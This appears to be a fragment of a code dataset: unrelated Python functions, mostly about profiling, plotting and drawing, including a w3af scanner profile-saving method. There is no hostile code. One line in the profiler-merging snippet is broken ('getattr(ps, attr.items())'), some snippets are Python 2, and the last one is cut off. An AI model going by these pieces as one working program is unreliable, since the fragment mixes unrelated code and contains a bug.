else:\n destination_file = config.profiling__destination\n\n with extended_open(destination_file, mode=\"w\"):\n # Reverse sort in the order of compile+exec time\n for ps in sorted(\n _atexit_print_list, key=lambda a: a.compile_time + a.fct_call_time\n )[::-1]:\n if (\n ps.fct_callcount >= 1\n or ps.compile_time > 1\n or getattr(ps, \"callcount\", 0) > 1\n ):\n ps.summary(\n file=destination_file,\n n_ops_to_print=config.profiling__n_ops,\n n_apply_to_print=config.profiling__n_apply,\n )\n\n if ps.show_sum:\n to_sum.append(ps)\n else:\n # TODO print the name if there is one!\n print(\"Skipping empty Profile\")\n if len(to_sum) > 1:\n # Make a global profile\n cum = copy.copy(to_sum[0])\n msg = f\"Sum of all({len(to_sum)}) printed profiles at exit.\"\n cum.message = msg\n for ps in to_sum[1:]:\n for attr in [\n \"compile_time\",\n \"fct_call_time\",\n \"fct_callcount\",\n \"vm_call_time\",\n \"rewriter_time\",\n \"linker_time\",\n \"validate_time\",\n \"import_time\",\n \"linker_node_make_thunks\",\n ]:\n setattr(cum, attr, getattr(cum, attr) + getattr(ps, attr))\n\n # merge dictionary\n for attr in [\n \"apply_time\",\n \"apply_callcount\",\n \"apply_cimpl\",\n \"variable_shape\",\n \"variable_strides\",\n \"variable_offset\",\n \"linker_make_thunk_time\",\n ]:\n cum_attr = getattr(cum, attr)\n for key, val in getattr(ps, attr.items()):\n assert key not in cum_attr, (key, cum_attr)\n cum_attr[key] = val\n\n if cum.rewriter_profile and ps.rewriter_profile:\n try:\n merge = cum.rewriter_profile[0].merge_profile(\n cum.rewriter_profile[1], ps.rewriter_profile[1]\n )\n assert len(merge) == len(cum.rewriter_profile[1])\n cum.rewriter_profile = (cum.rewriter_profile[0], merge)\n except Exception as e:\n print(e)\n cum.rewriter_profile = None\n else:\n cum.rewriter_profile = None\n\n cum.summary(\n file=destination_file,\n n_ops_to_print=config.profiling__n_ops,\n n_apply_to_print=config.profiling__n_apply,\n )\n\n if config.print_global_stats:\n print_global_stats()", "def mark_person(snap, annot, switch_format=True):\n frame = cv2.imread(snap)\n height, width, _ = frame.shape\n\n iTL = 0\n iBR = 2\n TL = (int(annot.bounding_poly.normalized_vertices[iTL].x * width),\n int(annot.bounding_poly.normalized_vertices[iTL].y * height))\n BR = (int(annot.bounding_poly.normalized_vertices[iBR].x * width),\n int(annot.bounding_poly.normalized_vertices[iBR].y * height))\n \n print(f\"Drawing from {TL} to {BR}\")\n\n color = (0, 0, 255)\n thickness = 2\n frame = cv2.rectangle(frame, TL, BR, color, thickness)\n if switch_format:\n snap = snap.replace(\"png\", \"jpeg\")\n cv2.imwrite(snap, frame)\n return snap", "def testAlignedProfile(self):\n # Use Plot backend widget to submit mouse events\n widget = self.plot.getWidgetHandle()\n for method in ('sum', 'mean'):\n with self.subTest(method=method):\n # 2 positions to use for mouse events\n pos1 = widget.width() * 0.4, widget.height() * 0.4\n pos2 = widget.width() * 0.6, widget.height() * 0.6\n\n for action in (self.toolBar.hLineAction, self.toolBar.vLineAction):\n with self.subTest(mode=action.text()):\n # Trigger tool button for mode\n action.trigger()\n # Without image\n self.mouseMove(widget, pos=pos1)\n self.mouseClick(widget, qt.Qt.LeftButton, pos=pos1)\n\n # with image\n self.plot.addImage(\n numpy.arange(100 * 100).reshape(100, -1))\n self.mousePress(widget, qt.Qt.LeftButton, pos=pos1)\n self.mouseMove(widget, pos=pos2)\n self.mouseRelease(widget, qt.Qt.LeftButton, pos=pos2)\n\n self.mouseMove(widget)\n self.mouseClick(widget, qt.Qt.LeftButton)\n\n manager = self.toolBar.getProfileManager()\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break", "def draw(self, base, level):\n\n a = base.a\n b = base.b\n\n if level > 0:\n delta = base.b - base.a\n px = a.x + delta.x / 3\n py = a.y + delta.y / 3\n rx = a.x + 2 * delta.x / 3\n ry = a.y + 2 * delta.y / 3\n p = Point(px, py)\n r = Point(rx, ry)\n q = Point(rx, ry)\n q.rotate_deg(60, p)\n self.draw(Line(a,p), level-1)\n self.draw(Line(p,q), level-1)\n self.draw(Line(q,r), level-1)\n self.draw(Line(r,b), level-1)\n else:\n self.container.window.create_line(a.x, a.y, b.x, b.y)", "def make_lineprofile(npix,rstar,xc,vgrid,A,veq,linewidth):\n vc=(np.arange(npix)-xc)/rstar*veq\n vs=vgrid[np.newaxis,:]-vc[:,np.newaxis]\n profile=1.-A*np.exp( -(vs*vs)/2./linewidth**2)\n return profile", "def extract_profile(tif, line_file, ds):\r\n\r\n import numpy as np\r\n import gdal\r\n import fiona\r\n from scipy.interpolate import interp1d\r\n# from scipy.interpolate import interp2d\r\n from scipy.ndimage import map_coordinates\r\n \r\n #%% Create evenly spaced points\r\n # Read coordinates of the profile line from shapefile\r\n fiona_obj = fiona.open(line_file)\r\n# line = fiona_obj.next()\r\n line = iter(fiona_obj).next() # this line is proper syntax for fiona v2. Corrected on Mar 12, 2021 by TCB\r\n coords = np.array( line['geometry']['coordinates'] ) # m the easting and northing coordinates of the vertices along the shapefile\r\n \r\n sqrd_deltas = np.diff(coords, axis=0)**2 # squared differences between x and y coordinates\r\n deltas = np.sum(sqrd_deltas, axis=1)**0.5 # m straight-line path length between adjacent points in the shapefile\r\n dist = np.cumsum( np.append(0, deltas) ) # m running distance along the shapefile from one end.\r\n \r\n disti = np.arange(dist[0], dist[-1], ds) # m vector of evenly spaced distances along the shapefile,\r\n # equivalent to an evenly spaced version of dist\r\n xi = interp1d(dist, coords[:,0])(disti) # m the easting coordinates of disti points, at which profile will be extracted\r\n yi = interp1d(dist, coords[:,1])(disti) # m the northing coordinates of disti points, at which profile will be extracted\r\n\r\n #%% Manipulate the raster and extract its data\r\n # ---- dimensions of geotiff\r\n gtif = gdal.Open(tif)\r\n xmin,xres,xskew,ymax,yskew,yres = gtif.GetGeoTransform()\r\n\r\n\r\n # convert the profile coordinates into pixel coordinates\r\n px = (xi - xmin) / xres\r\n py = (yi - ymax) / yres\r\n# px = np.round(col).astype(int)\r\n# py = np.round(row).astype(int)\r\n \r\n \r\n # pull out the array of raster data. Data are assumed to be in band 1.\r\n gtif_data = gtif.GetRasterBand(1).ReadAsArray()\r\n# gtif_data = band.ReadAsArray()px,py, 1, 1)\r\n \r\n # Two early versions of extacting the data:\r\n # profile = map_coordinates(gtif_data,[px,py],order=0,cval=np.nan)\r\n # profile = interp2d(np.arange(gtif_data.shape[1]), np.arange(gtif_data.shape[0]), \r\n # gtif_data)(px, py)\r\n\r\n # Interpolate within gtif_data at given pixel coordinates to identify values from the geotiff \r\n # Uses a 1st order spline interpolant to extract estimated values of\r\n # gtif_data at the (non-integer) pixel values px and py.\r\n # Function returns `cval' at undefined values of gtif_data.\r\n profile = map_coordinates(gtif_data, np.vstack((py, px)),\r\n order=1, cval=np.nan)\r\n \r\n# profile = np.array(profile,dtype=float)\r\n if type(profile[0]) == float:\r\n profile[np.abs(profile) == 9999] = np.nan\r\n \r\n return disti, profile", "def draw(self, prev_draw):\n # Std deviations for each parameter, the mean is the current location\n # strike = .375\n # length = 4.e3\n # width = 3.e3\n # depth = .1875\n # slip = .01\n # rake = .25\n # dip = .0875\n # longitude = .025\n # latitude = .01875\n strike_std = 5. # strike_std = 1.\n length_std = 5.e3 # length_std = 2.e4\n width_std = 2.e3 # width_std = 1.e4\n depth_std = 1.e3 # depth_std = 2.e3\n slip_std = 0.5 # slip_std = 0.5\n rake_std = 0.5 # rake_std = 0.5\n dip_std = 0.1 # dip_std = 0.1\n longitude_std = 0.15 # longitude_std = .025\n latitude_std = 0.15 # latitude_std = .025\n mean = np.zeros(9)\n # square for std => cov\n cov = np.diag(np.square([strike_std, length_std, width_std, depth_std, slip_std, rake_std,\n dip_std, longitude_std, latitude_std]))\n\n cov *= 0.25;\n\n # random draw from normal distribution\n e = stats.multivariate_normal(mean, cov).rvs()\n\n # does sample update normally\n print(\"Random walk difference:\", e)\n print(\"New draw:\", prev_draw + e)\n new_draw = prev_draw + e\n\n \"\"\"\n Here we make some fixed changes to the dip and depth according \n to a simple rule documented elsewhere. This fix will likely\n depreciate upon finishing proof of concept paper and work on 1852\n event.\n \"\"\"\n # doctor dip to 20 degrees as discussed\n new_draw[6] = 20\n # doctor depth according to adhoc fix\n new_draw[3] = self.doctored_depth_1852_adhoc(new_draw[7], new_draw[8], new_draw[6])\n\n # return appropriately doctored draw\n return new_draw", "def __init__(\n self,\n img_path: Union[str, \"Path\"],\n profile: dict,\n crop_size: int,\n padding: int = 0,\n **kwargs\n ):\n super().__init__()\n self.img_path = img_path\n self.crop_size = crop_size\n self.padding = padding\n\n profile.update(blockxsize=crop_size, blockysize=crop_size, tiled=True, **kwargs)\n\n # Create the file and get the indices of write locations\n with rasterio.open(self.img_path, \"w\", **profile) as dst:\n self.height = dst.height\n self.width = dst.width\n self.profile = dst.profile\n\n _y0s = range(0, self.height, self.crop_size)\n _x0s = range(0, self.width, self.crop_size)\n self.y0x0 = list(itertools.product(_y0s, _x0s))", "def merge_profile(prof1, prof2):\r\n new_t = []\r\n new_l = []\r\n new_sub_profile = []\r\n #merge common(same object) opt\r\n for l in set(prof1[0]).intersection(set(prof2[0])):\r\n idx1 = prof1[0].index(l)\r\n idx2 = prof2[0].index(l)\r\n new_t.append(prof1[1][idx1] +\r\n prof2[1][idx2])\r\n new_l.append(l)\r\n if hasattr(l, 'merge_profile'):\r\n assert len(prof1[6][idx1]) == len(prof2[6][idx2])\r\n new_sub_profile.append(l.merge_profile(prof1[6][idx1],\r\n prof2[6][idx2]))\r\n else:\r\n new_sub_profile.append(None)\r\n\r\n # merge not common opt\r\n from theano.compat.six import StringIO\r\n for l in set(prof1[0]).symmetric_difference(set(prof2[0])):\r\n #The set trick above only work for the same object optimization\r\n #It don't work for equivalent optimization.\r\n #So we try to merge equivalent optimization here.\r\n new_l_names = [o.name for o in new_l]\r\n if l.name in new_l_names:\r\n idx = new_l_names.index(l.name)\r\n io1 = StringIO()\r\n io2 = StringIO()\r\n l.print_summary(io1)\r\n new_l[idx].print_summary(io2)\r\n if io1.read() == io2.read():\r\n if l in prof1[0]:\r\n p = prof1\r\n else:\r\n p = prof2\r\n new_t[idx] += p[1][p[0].index(l)]\r\n if hasattr(l, 'merge_profile'):\r\n assert len(p[6][p[0].index(l)]) == \\\r\n len(new_sub_profile[idx])\r\n new_sub_profile[idx] = l.merge_profile(\r\n new_sub_profile[idx], p[6][p[0].index(l)])\r\n else:\r\n new_sub_profile[idx] = None\r\n continue\r\n if l in prof1[0]:\r\n p = prof1\r\n else:\r\n p = prof2\r\n new_t.append(p[1][p[0].index(l)])\r\n idx = p[0].index(l)\r\n new_l.append(l)\r\n new_sub_profile.append(p[6][idx])\r\n\r\n new_opt = SeqOptimizer(*new_l)\r\n #We need to assert based on the name as we merge also based on\r\n #the name.\r\n assert set([l.name for l in prof1[0]]).issubset(\r\n set([l.name for l in new_l]))\r\n assert set([l.name for l in prof2[0]]).issubset(\r\n set([l.name for l in new_l]))\r\n assert len(new_t) == len(new_opt) == len(new_sub_profile)\r\n return (new_opt, new_t, prof1[2] + prof2[2],\r\n prof1[3] + prof2[3],\r\n -1, -1, new_sub_profile, [])", "def genFrameImages((widthPixels, heightPixels), flashColourGen, flashColourGenPipTrain, numFrames, FPS, superSamplingScale=8, BG_COLOUR=(0,0,0), TEXT_COLOUR=(255,255,255), GFX_COLOUR=(255,255,255), title=\"\", TITLE_COLOUR=(255,255,255), FRAMES_AS_FIELDS=False, frameSkipChecker=None, segments=[]):\n\n # we're going to draw a larger (super sampled) image and then scale it down\n # to get smoothing (compensating for the lack of anti-aliased drawing functions\n # in PIL)\n\n width = widthPixels * superSamplingScale\n height = heightPixels * superSamplingScale\n\n flashCols = list(flashColourGen)[0:numFrames]\n flashColsPipTrain = list(flashColourGenPipTrain)[0:numFrames]\n\n # we'll pretend we're working within a rectangle (0,0) - (160,90)\n # and use a scaling function to map to out actual dimensions\n scaler = AspectPreservingCoordinateScaler((160,90),(width,height))\n\n # load a font for text\n font = loadFont(sizePt = scaler.s(4))\n smallfont = loadFont(sizePt = scaler.s(4))\n \n # work out the segment description text, then check its size and adjust the fontsize to ensure it fits within bounding area\n if segments:\n segment_description_text = \"\\n\".join(map(lambda seg : seg[\"description\"], segments))\n tmpimg = Image.new(\"RGB\", (width, height), color=BG_COLOUR)\n tmpdraw = ImageDraw.Draw(tmpimg)\n w,h = tmpdraw.multiline_textsize(segment_description_text, font=smallfont)\n max_w, max_h = scaler.xy((140,13))\n \n shrink_factor = min(float(max_w) / w, float(max_h) / h, 1)\n smallfont = loadFont(sizePt = scaler.s(4*shrink_factor))\n \n poy = 0 # pie Y offset\n dfy = 65 # duration and FPS labels Y offset\n if segments:\n poy = -10\n dfy = 19\n\n\n\n WHITE=(255,255,255)\n BLACK=(0,0,0)\n\n if FRAMES_AS_FIELDS:\n imageName = \"field\"\n labelFps = FPS / 2\n else:\n imageName = \"frame\"\n labelFps = FPS\n\n\n for frameNum in range(0,numFrames):\n if frameSkipChecker is not None:\n shouldSkip=frameSkipChecker(frameNum)\n if shouldSkip:\n yield None\n continue\n\n timecode = frameNumToTimecode(frameNum, FPS, framesAreFields=FRAMES_AS_FIELDS)\n timeSecs = float(frameNum) / FPS\n nextTimeSecs = float(frameNum+1) / FPS # time of next frame after this\n durationTimecode = frameNumToTimecode(numFrames, FPS)\n\n # create black image and an object to let us draw on it\n img = Image.new(\"RGB\", (width, height), color=BG_COLOUR)\n draw = ImageDraw.Draw(img)\n\n # draw a flashing rectangular box on the left side\n flashColour = flashCols[frameNum]\n topLeft = scaler.xy((10, 30))\n bottomRight = scaler.xy((40, 60))\n draw.rectangle(topLeft + bottomRight, outline=None, fill=GFX_COLOUR)\n topLeft = scaler.xy((11, 31))\n bottomRight = scaler.xy((39, 59))\n draw.rectangle(topLeft + bottomRight, outline=None, fill=flashColour)\n\n # draw text label explaining to attach light sensor to the flashing box\n topLeft = scaler.xy((41, 37))\n draw.text(topLeft, \"Use light detector\", font=font, fill=TEXT_COLOUR)\n topLeft = scaler.xy((41, 41))\n draw.text(topLeft, \"on centre of\", font=font, fill=TEXT_COLOUR)\n topLeft = scaler.xy((41, 45))\n draw.text(topLeft, \"this box\", font=font, fill=TEXT_COLOUR)\n\n # draw text labels giving frame number, timecode and seconds covered by this frame\n topLeft = scaler.xy((10, 4))\n draw.text(topLeft, timecode, font=font, fill=TEXT_COLOUR)\n topLeft = scaler.xy((10, 9))\n draw.text(topLeft, \"%06d of %d %ss\" % (frameNum, numFrames, imageName), font=font, fill=TEXT_COLOUR)\n topLeft = scaler.xy((10, 14))\n draw.text(topLeft, u\"%08.3f \\u2264 t < %08.3f secs\" % (timeSecs, nextTimeSecs), font=font, fill=TEXT_COLOUR)\n\n topLeft = scaler.xy((10,dfy))\n draw.text(topLeft, \"Duration: \" + durationTimecode, font=font, fill=TEXT_COLOUR)\n topLeft = scaler.xy((10,dfy+5))\n draw.text(topLeft, \"%d fps\" % labelFps, font=font, fill=TEXT_COLOUR)\n\n # and more text labels, but this time right justified\n text = title\n w,h = font.getsize(text)\n topLeft = scaler.xy((150,4))\n topLeft = topLeft[0] - w, topLeft[1]\n draw.text(topLeft, text, font=font, fill=TITLE_COLOUR)\n\n # draw an outer ring segment indicating the time period covered by the current frame\n topLeft = scaler.xy((105, 20+poy))\n bottomRight = scaler.xy((155, 70+poy))\n angle1 = 360 * (frameNum % FPS) / FPS\n angle2 = 360 * ((frameNum % FPS) + 1) / FPS\n draw.pieslice(topLeft + bottomRight, start=270+angle1, end=270+angle2, outline=None, fill=GFX_COLOUR)\n\n # hollow it out to make the circle into a ring\n topLeft = scaler.xy((108, 23+poy))\n bottomRight = scaler.xy((152, 67+poy))\n draw.ellipse(topLeft + bottomRight, outline=None, fill=BG_COLOUR)\n\n\n # draw frame num ring\n topLeft = scaler.xy((110, 25+poy))\n bottomRight = scaler.xy((150, 65+poy))\n angle = 360 * (frameNum % FPS) / FPS\n if (frameNum / FPS) % 2 == 0: # if this is an even second (0-0.9, 2-2.9, 4-4.9 etc)\n draw.pieslice(topLeft + bottomRight, start=270, end=270+angle, outline=None, fill=GFX_COLOUR)\n else:\n draw.pieslice(topLeft + bottomRight, start=270+angle, end=270+360, outline=None, fill=GFX_COLOUR)\n\n # hollow it out to make the circle into a ring\n topLeft = scaler.xy((113, 28+poy))\n bottomRight = scaler.xy((147, 62+poy))\n draw.ellipse(topLeft + bottomRight, outline=None, fill=BG_COLOUR)\n \n # draw outer for segments\n if segments:\n topLeft = scaler.xy((115-0.25, 30+poy-0.25))\n bottomRight = scaler.xy((145+0.25, 60+poy+0.25))\n draw.ellipse(topLeft + bottomRight, fill=WHITE, outline=None)\n topLeft = scaler.xy((115, 30+poy))\n bottomRight = scaler.xy((145, 60+poy))\n draw.ellipse(topLeft + bottomRight, fill=BLACK, outline=None)\n\n # draw progress pie\n topLeft = scaler.xy((115, 30+poy))\n bottomRight = scaler.xy((145, 60+poy))\n angle = 360.0*frameNum/numFrames\n precise_filled_pieslice(draw, topLeft + bottomRight, start=270, end=270+angle, outline=None, fill=GFX_COLOUR)\n\n # draw segments over the pieslice\n if segments:\n for i in range(0, len(segments)):\n angle = math.radians(270 + 360.0*segments[i][\"startSecs\"]/numFrames*FPS)\n centre = scaler.xy((130,45+poy))\n armEnd = scaler.xy((130 + 15*math.cos(angle), 45+poy + 15*math.sin(angle)))\n draw.line([centre, armEnd], fill=WHITE, width=int(scaler.s(0.25)))\n \n segStartFrame = segments[i][\"startSecs\"] * FPS\n nextStartFrame = segments[(i+1) % len(segments)][\"startSecs\"] * FPS\n if nextStartFrame <= segStartFrame:\n nextStartFrame += numFrames\n midAngle = math.radians(270 + 360.0* (segStartFrame+nextStartFrame)/2/numFrames)\n w,h = font.getsize(segments[i][\"label\"])\n centre = scaler.xy((130 + 15*math.cos(midAngle)*0.7, 45+poy + 15*math.sin(midAngle)*0.7))\n topLeft = centre[0] - w/2, centre[1] - h/2\n draw.text(topLeft, segments[i][\"label\"], fill=WHITE, font=font)\n\n # draw segment long labels\n topLeft = scaler.xy((10,61))\n draw.multiline_text(topLeft, segment_description_text, fill=WHITE, font=smallfont)\n \n # draw pulse train at the bottom\n LIM=FPS\n NUM_BLOBS = 2*LIM + 1\n blobSpacing = 150.0/NUM_BLOBS\n\n for offset in range(-LIM, +LIM+1):\n left = 80+blobSpacing*(offset-0.5)\n right = 80+blobSpacing*(offset+0.5)\n\n topLeft = scaler.xy(( left, 80 ))\n bottomRight = scaler.xy(( right, 85 ))\n\n seqIndex = offset + frameNum\n if seqIndex >= 0 and seqIndex < numFrames:\n colour = flashColsPipTrain[seqIndex]\n draw.rectangle(topLeft + bottomRight, outline=None, fill = colour)\n\n if offset == 0:\n # draw blob above\n topLeft = scaler.xy(( left, 75 ))\n bottomRight = scaler.xy(( right, 80 ))\n draw.rectangle(topLeft + bottomRight, outline=None, fill = GFX_COLOUR)\n\n # and below\n topLeft = scaler.xy(( left, 85 ))\n bottomRight = scaler.xy(( right, 90 ))\n draw.rectangle(topLeft + bottomRight, outline=None, fill = GFX_COLOUR)\n\n # shrink the image using high quality downsampling\n try:\n scalingMode = Image.LANCZOS\n except AttributeError:\n scalingMode = Image.BICUBIC\n\n rescaledImage = img.resize((widthPixels,heightPixels), scalingMode)\n\n yield rescaledImage", "def profile(script, argv, timer, pickle_protocol, dump_filename, mono):\n filename, code, globals_ = script\n sys.argv[:] = [filename] + list(argv)\n __profile__(filename, code, globals_,\n timer=timer, pickle_protocol=pickle_protocol,\n dump_filename=dump_filename, mono=mono)", "def stm_profile_plot(flat_file, points, scan_dir=0, cmap=None, vmin=None, vmax=None, xy_ticks=4, z_ticks=4):\n nm = 10 ** -9 # Define the nanometer to meter conversion.\n\n fig, ax = plt.subplots() # Create an instance of a pyplot figure and axis.\n\n # Set the minimum of the scan data to zero.\n figure_data = (flat_file[scan_dir].data - np.amin(flat_file[scan_dir].data)) / nm\n\n if cmap is None: # If no color scheme is given use hot as default.\n cmap = 'hot'\n\n if vmin is None: # If no z-axis minimum is given use minimum of the image data.\n vmin = np.amin(figure_data)\n if vmax is None: # If no z-axis maxmimum is given use 125% of the maximum in the image data.\n vmax = 1.25 * np.amax(figure_data)\n\n # Add image plot to the axis and define it so that the color map can be generated.\n cax = ax.imshow(figure_data, origin='lower', cmap=cmap, vmin=vmin, vmax=vmax)\n\n # Convert nanometer values into pixel numbers.\n for point in range(len(points)):\n points[point][0] = nm2pnt(points[point][0], flat_file, axis='x')\n points[point][1] = nm2pnt(points[point][1], flat_file, axis='y')\n\n # Plot the line profile points on the axis.\n ax.plot(points[:, 0], points[:, 1], 'bo-')\n\n xy_units = flat_file[scan_dir].info['unitxy'] # Get xy units.\n\n x_res = flat_file[scan_dir].info['xres'] # Get number of x-axis pixels.\n y_res = flat_file[scan_dir].info['yres'] # Get number of y-axis pixels.\n\n x_max = flat_file[scan_dir].info['xreal'] # Get x-axis image size.\n y_max = flat_file[scan_dir].info['yreal'] # get y-axis image size.\n\n # Set the x-axis ticks from number given.\n ax.set_xticks([x for x in np.arange(0, x_res + 1, x_res / xy_ticks)])\n # Set the x-axis tick labels from image size.\n ax.set_xticklabels([str(np.round(x, 1)) for x in np.arange(0, x_max + 1, x_max / xy_ticks)])\n\n # Set the y-axis ticks from number given\n ax.set_yticks([y for y in np.arange(0, y_res + 1, y_res / xy_ticks)])\n # Set the y-axis tick labels from image size.\n ax.set_yticklabels([str(np.round(y, 1)) for y in np.arange(0, y_max + 1, y_max / xy_ticks)])\n\n # Set the x- and y-axis labels.\n ax.set_xlabel(xy_units, size=16, weight='bold')\n ax.set_ylabel(xy_units, size=16, weight='bold')\n\n # Define the limits of the plot.\n ax.set_xlim([0, x_res])\n ax.set_ylim([0, y_res])\n\n # St the plot title with the image setpoint parameters.\n ax.set_title('Set-Points: {voltage} V, {current} pA'.format(voltage=flat_file[scan_dir].info['vgap'],\n current=np.round(\n flat_file[scan_dir].info['current']*10**12)))\n\n # Define list containing the z-axis ticks from number given.\n cbar_ticks = [z for z in np.arange(vmin, vmax * 1.01, vmax / z_ticks)]\n # Define the z-axis tick labels.\n cbar_ticklabels = [str(np.round(z, 1)) for z in np.arange(vmin, vmax + 1, vmax / z_ticks)]\n # Create color bar.\n cbar = fig.colorbar(cax, ticks=cbar_ticks)\n # Set the color bar tick labels.\n cbar.ax.set_yticklabels(cbar_ticklabels, size=16)\n # Set color bar label.\n cbar.set_label('Height [' + xy_units + ']', size=18, weight='bold')\n\n plt.show()", "def magic_profile(self, parameter_s=''):\n if self.rc.profile:\n printpl('Current IPython profile: $self.rc.profile.')\n else:\n print 'No profile active.'", "def save_current_to_profile(self, profile_name, prof_desc='', prof_path='',\n self_contained=False):\n # Open the already existing profile\n new_profile = profile(profile_name, workdir=os.path.dirname(prof_path))\n\n # shortcut\n w3af_plugins = self._w3af_core.plugins\n\n # Save the enabled plugins\n for plugin_type in w3af_plugins.get_plugin_types():\n enabled_plugins = []\n for plugin_name in w3af_plugins.get_enabled_plugins(plugin_type):\n enabled_plugins.append(plugin_name)\n new_profile.set_enabled_plugins(plugin_type, enabled_plugins)\n\n # Save the plugin options\n for plugin_type in w3af_plugins.get_plugin_types():\n for plugin_name in w3af_plugins.get_enabled_plugins(plugin_type):\n plugin_options = w3af_plugins.get_plugin_options(plugin_type,\n plugin_name)\n if plugin_options:\n new_profile.set_plugin_options(plugin_type,\n plugin_name,\n plugin_options,\n self_contained=self_contained)\n\n # Save the profile targets\n targets = cf.cf.get('targets')\n if targets:\n new_profile.set_target(' , '.join(t.url_string for t in targets))\n\n # Save the misc and http settings\n misc_settings = MiscSettings()\n new_profile.set_misc_settings(misc_settings.get_options())\n new_profile.set_http_settings(\n self._w3af_core.uri_opener.settings.get_options())\n\n # Save the profile name and description\n new_profile.set_desc(prof_desc)\n new_profile.set_name(profile_name)\n\n # Save the profile to the file\n new_profile.save(profile_name)\n\n return new_profile", "def __init__(self, velocity, vorticity, prof_coords, \n direction, beginMeanComput, **kwds):\n assert 'variables' not in kwds, 'variables parameter is useless.'\n super(Profiles, self).__init__(variables=[velocity, vorticity],\n **kwds)\n ## velocity field\n self.velocity = velocity\n ## vorticity field\n self.vorticity = vorticity\n ## X and Y coordinates of the profile\n self.prof_coords = prof_coords\n ## profile direction (0, 1 or 2)\n self.direction = direction\n ## time at which the computation of mean profile must begin\n self.beginMeanComput = beginMeanComput\n self.input = [velocity, vorticity]\n self.output = []", "def _profile(self) -> None:\n if self.use_case.profile:\n if self._profile_stats is None:\n self._profile_stats = pstats.Stats()\n if self._current_profiler is not None:\n self._current_profiler.disable()\n self._profile_stats.add(self._current_profiler)\n # TODO: use clear() instead of always creating a new profile\n self._current_profiler = cProfile.Profile()\n self._current_profiler.enable()", "def plot_visco_profiles(pointsh5, skip=slice(None,None,1), xscale=1e3, yscale=1e-2, tscale=3.1536e7, adjustRadial=False, benchmark=[], title=None):\n\tplt.figure()\n\n\tcoords,data,number,times = pu.load_h5_visco(pointsh5)\n\n\t#x = 1e3*np.loadtxt(points,usecols=[0]) # output_points2.txt\n\t#y = np.zeros_like(x)\n\tx = coords[:,0]\n\ty = np.zeros_like(x)\n\n\t# NOTE: plot elastic solution by passing dictionary as showelastic\n\t# Plot analytic elastic solution (t=0)\n\t#print(benchmark)\n\tif len(benchmark)>=1:\n\t\tur = zeros_like(x)\n\t\tuz = np.zeros_like(x)\n\t\tfor b in benchmark:\n\t\t\turi,uzi = m.calc_mogi_dp(x,y,**params)\n\t\t\tur += uri\n\t\t\tuz += uzi\n\t\tplt.plot(x*xscale,uz*yscale,'ko',label='benchmark')\n\n\t# Convert units\n\t#ur = np.hypot(data[:,:,0], data[:,:,1]) #assume progiles are along EW profile\n\tur = data[:,:,0]\n\tuz = data[:,:,2]\n\tx = x / xscale\n\tur = ur / yscale #cm\n\tuz = uz / yscale #cm\n\ttimes = times / tscale\n\t#times = times / 8.64e4 #days\n\t#times = times / 31536000 #years\n\n\t#plots = np.arange(0,times.size,skip)\n\t#print(plots.size)\n\t#way to cycle through markers if plotting many lines\n\t#marker = itertools.cycle(['o','^','s','D']) #plot(marker=marker.next() iterates list)\n\t#way to use gradually changing colors from a colormap\n\t#color = plt.cm.jet(1.0*i/plots.size)\n\tindplots = np.arange(times.size-1)\n\tprint(indplots)\n\tindplots = indplots[skip]\n\tprint(indplots)\n\tfor i in indplots:\n\t\tline, = plt.plot(x, uz[i], color=plt.cm.jet(1.0*i/indplots[-1]), label='{:.1f}'.format(times[i]))\n\t\tplt.plot(x, ur[i], ls='dashed', color=line.get_color())\n\t#print uz[i]\n\t#print uz[i-1]\n\n\tif title:\n\t\tplt.title(title)\n\telse:\n\t\tplt.title(pointsh5)\n\n\tplt.axhline(color='k',linestyle='dashed')\n\tplt.xlabel('Distance [{}]'.format(get_unit(xscale)))\n\tplt.ylabel('Displacement [{}]'.format(get_unit(yscale)))\n\tplt.show()\n\tplt.legend(title='{}'.format(get_unit(tscale)))\n\tplt.grid()", "def run_profile(package, profile_config):\n\n LOG.info(\"Running '%(name)s' [%(profile)s]\" % profile_config )\n\n profile = load_profile(package, profile_config)\n if not profile:\n return\n\n # create a subfolder for generator profiles\n if package.__name__ == \"pickup.generator_profile\":\n\n # first folder level is the module name. Append this to the staging area\n module_folder = profile.__name__.split(\".\")[-1]\n module_folder = join(config_instance.STAGING_AREA, module_folder)\n\n # into the module folder we put a folder based on the profile's name\n staging_folder = get_profile_folder(module_folder, profile_config)\n\n # just in case it does not exist, we'll create all required folders\n if not exists( staging_folder ):\n os.makedirs( staging_folder )\n LOG.debug( \"Created directory %r\" % staging_folder )\n else:\n staging_folder = config_instance.STAGING_AREA\n\n try:\n profile.run(staging_folder)\n except Exception, exc:\n LOG.error(\"Error staging '%s'. Error message: %s\" %\n (profile_config['name'], exc))\n LOG.exception(exc)", "def paintSkirt(self):\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(os.path.join(PATH_EDITOR_IMG, self.avatarConfiguration[\"gender\"], self.avatarConfiguration[\"bodySize\"], self.avatarConfiguration[\"typeSkirt\"]+\"_skirt\", self.avatarConfiguration[\"skirt\"] + IMG_EXTENSION))\n self.newAvatarImage(imgPath, \"skirt\")", "def update_annot(ind):\n # update text annotation\n pos = sc.get_offsets()[ind[\"ind\"][0]]\n annot.xy = pos\n idxlist = []\n for element in PC:\n idxlist.append(np.allclose(element, pos))\n idx = idxlist.index(True)\n annotation_string = f'{idx + 1}\\n'\n if display_parameter_values:\n for i, label in enumerate(parameterList):\n annotation_string += (f'{parameters[i, idx]: 10.2f} '\n f'+/- {errors[i, idx]:8.2f} '\n f'({label})\\n')\n annot.set_text(annotation_string[:-1])\n annot.get_bbox_patch().set_alpha(0.4)\n\n # update immage annotation\n label = mapp.listOfFiles[idx].split(os.sep)[-1].split('.')[0]\n image = get_image(mapp.pltdir, label)\n ab.xy = pos\n ab.offsetbox = OffsetImage(image)\n ax.add_artist(ab)\n if show_both_images:\n additional_image = get_image(additional_fitplot_folder, label)\n ac.xy = pos + shift_second_image\n ac.offsetbox = OffsetImage(additional_image)\n ax.add_artist(ac)", "def profile(self, r, **attr):\n\n tablename = self.tablename\n get_config = current.s3db.get_config\n\n header = get_config(tablename, \"profile_header\")\n\n # Get the page widgets\n widgets = get_config(tablename, \"profile_widgets\")\n if not widgets and not header:\n # Profile page not configured:\n if r.representation not in (\"dl\", \"aadata\"):\n # Redirect to the Read View\n redirect(r.url(method=\"read\"))\n else:\n # No point redirecting\n r.error(405, current.ERROR.BAD_METHOD)\n\n # Index the widgets by their position in the config\n for index, widget in enumerate(widgets):\n widget[\"index\"] = index\n\n if r.representation == \"dl\":\n # Ajax-update of one datalist\n index = r.get_vars.get(\"update\", None)\n 